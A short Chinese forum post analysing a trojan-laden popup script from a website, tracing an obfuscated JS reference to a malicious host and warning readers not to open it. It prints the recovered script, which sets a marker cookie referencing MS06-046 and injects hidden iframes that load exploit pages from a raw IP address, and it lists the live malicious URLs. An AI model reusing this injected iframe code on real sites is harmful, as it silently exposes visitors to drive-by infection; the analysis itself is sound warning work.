|
注册后成功获取代码。 
上面是获取的代码,开始解剖, 下载下来www.ip686.com/popup.js, 下面是他隐藏的方式, 首先定义了popwin和扩展名JS, 
结合上面的说法和上面图片最后一句JS,就形成了,www.ip686.com/popwin.JS这个木马地址, 下载下来这面的用记事本打开,就是这个了,木马露出原形了, 
http://61.152.169.234/web.htm这个就是木马地址,请大家不要打开,容易中毒, <SCRIPT LANGUAGE="javascript" TYPE="text/javascript"> var cookieString = document.cookie; var start = cookieString.indexOf("woshi0day="); if (start != -1) {} else { var expires = new Date(); expires.setTime(expires.getTime() + 9 * 60 * 60 * 1000); document.cookie = "woshi0day=Ms06-046;expires=" + expires.toGMTString();
document.write("<iframe width=100 height=0 src='http://61.152.169.234/vip1.htm'></iframe>");
document.write("<iframe width=100 height=0 src='http://61.152.169.234/vip3.htm'></iframe>");
document.write("<script src='http://s64.cnzz.com/stat.php?id=522545&web_id=522545' language=JavaScript charset=gb2312><//script>");
}</SCRIPT>
还有CNZZ的统计,哈哈
|
